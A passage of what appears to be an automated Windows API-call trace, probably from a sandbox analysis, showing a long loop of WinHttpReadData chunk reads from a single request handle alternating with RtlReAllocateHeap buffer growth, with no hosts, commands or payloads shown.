lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f04040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.248] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x159000) returned 0x6670040 [0206.339] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67c6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67c6840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.385] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x15b800) returned 0x6db0040 [0206.427] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f09040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f09040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.435] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x15e000) returned 0x6670040 [0206.467] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67cb840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67cb840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.469] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x160800) returned 0x6db0040 [0206.529] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f0e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f0e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.530] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x163000) returned 0x6670040 [0206.568] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67d0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67d0840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.618] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x165800) returned 0x6db0040 [0206.652] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f13040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f13040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.689] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x168000) returned 0x6670040 [0206.725] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67d5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67d5840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.726] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x16a800) returned 0x6db0040 [0206.759] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f18040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f18040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.760] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x16d000) returned 0x6670040 [0206.817] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67da840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67da840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.855] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x16f800) returned 0x6db0040 [0206.889] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f1d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f1d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.930] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x172000) returned 0x6670040 [0206.964] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67df840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67df840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.055] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x174800) returned 0x6db0040 [0207.089] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f22040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f22040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.148] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x177000) returned 0x6670040 [0207.182] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67e4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67e4840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.228] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x179800) returned 0x6db0040 [0207.272] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f27040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f27040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.409] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x17c000) returned 0x6670040 [0207.443] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67e9840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67e9840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.450] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x17e800) returned 0x6db0040 [0207.485] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f2c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f2c040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.545] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x181000) returned 0x6670040 [0207.579] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67ee840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67ee840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.635] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x183800) returned 0x6db0040 [0207.670] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f31040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f31040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.674] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x186000) returned 0x6670040 [0207.708] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67f3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67f3840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.760] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x188800) returned 0x6db0040 [0207.851] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f36040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f36040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.858] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x18b000) returned 0x6670040 [0207.895] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67f8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67f8840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0207.902] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x18d800) returned 0x6db0040 [0207.937] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f3b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f3b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0208.008] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x190000) returned 0x6670040 [0208.044] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67fd840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67fd840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0208.071] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x192800) returned 0x6db0040 [0208.106] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f40040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f40040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0208.125] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x195000) returned 0x6670040 [0208.160] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6802840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6802840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0208.227] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x197800) returned 0x6db0040 [0208.376] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f45040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f45040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0208.428] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x19a000) returned 0x6670040 [0208.470] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6807840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6807840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0208.518] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x19c800) returned 0x6db0040 [0208.618] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f4a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f4a040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0208.678] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x19f000) returned 0x6670040 [0208.718] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x680c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x680c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0208.755] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x1a1800) returned 0x6db0040 [0208.838] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f4f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f4f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0208.916] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1a4000) returned 0x7310040 [0208.952] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74b1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74b1840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.036] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1a6800) returned 0x6db0040 [0209.065] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f54040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f54040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.080] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1a9000) returned 0x7310040 [0209.129] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74b6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74b6840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.141] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1ab800) returned 0x6db0040 [0209.257] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f59040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f59040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.270] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1ae000) returned 0x7310040 [0209.300] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74bb840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74bb840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.303] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1b0800) returned 0x6db0040 [0209.332] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f5e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f5e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.380] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1b3000) returned 0x7310040 [0209.415] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74c0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74c0840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.457] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1b5800) returned 0x6db0040 [0209.492] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f63040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f63040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.505] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1b8000) returned 0x7310040 [0209.540] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74c5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74c5840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.559] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1ba800) returned 0x6db0040 [0209.593] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f68040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f68040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.636] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1bd000) returned 0x7310040 [0209.672] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74ca840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74ca840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.706] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1bf800) returned 0x6db0040 [0209.739] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f6d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f6d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.739] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1c2000) returned 0x7310040 [0209.768] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74cf840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74cf840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.769] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1c4800) returned 0x6db0040 [0209.816] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f72040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f72040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.856] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1c7000) returned 0x7310040 [0209.893] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74d4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74d4840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.930] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1c9800) returned 0x6db0040 [0209.967] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f77040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f77040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0209.970] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1cc000) returned 0x7310040 [0210.008] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74d9840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74d9840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.040] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1ce800) returned 0x6db0040 [0210.072] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f7c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f7c040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.144] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1d1000) returned 0x7310040 [0210.174] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74de840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74de840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.200] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1d3800) returned 0x6db0040 [0210.236] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f81040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f81040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.249] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1d6000) returned 0x7310040 [0210.279] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74e3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74e3840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.280] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1d8800) returned 0x6db0040 [0210.309] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f86040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f86040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.346] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1db000) returned 0x7310040 [0210.381] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74e8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74e8840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.407] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1dd800) returned 0x6db0040 [0210.460] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f8b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f8b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.470] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1e0000) returned 0x7310040 [0210.609] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74ed840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74ed840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.609] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1e2800) returned 0x6db0040 [0210.649] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f90040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f90040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.649] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1e5000) returned 0x7310040 [0210.687] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74f2840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74f2840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.688] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1e7800) returned 0x6db0040 [0210.859] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f95040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f95040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.860] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1ea000) returned 0x7310040 [0210.936] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74f7840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74f7840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0210.970] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1ec800) returned 0x6db0040 [0211.011] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f9a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f9a040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0211.096] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1ef000) returned 0x7310040 [0211.136] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x74fc840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x74fc840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0211.170] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1f1800) returned 0x6db0040 [0211.214] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f9f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6f9f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0211.218] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1f4000) returned 0x7310040 [0211.255] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7501840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7501840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0211.286] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1f6800) returned 0x6db0040 [0211.435] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fa4040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fa4040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0211.446] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1f9000) returned 0x7310040 [0211.556] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7506840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7506840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0211.627] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x1fb800) returned 0x6db0040 [0211.662] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fa9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fa9040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0211.720] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x1fe000) returned 0x7310040 [0211.757] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x750b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x750b840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0211.823] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x200800) returned 0x6db0040 [0211.857] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fae040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fae040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0211.939] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x203000) returned 0x7310040 [0211.980] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7510840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7510840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0212.047] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x205800) returned 0x6db0040 [0212.084] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fb3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fb3040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0212.122] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x208000) returned 0x7310040 [0212.268] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7515840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7515840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0212.330] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x20a800) returned 0x6db0040 [0212.364] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fb8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fb8040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0212.373] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x20d000) returned 0x7310040 [0212.566] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x751a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x751a840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0212.618] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x20f800) returned 0x6db0040 [0212.711] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fbd040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: 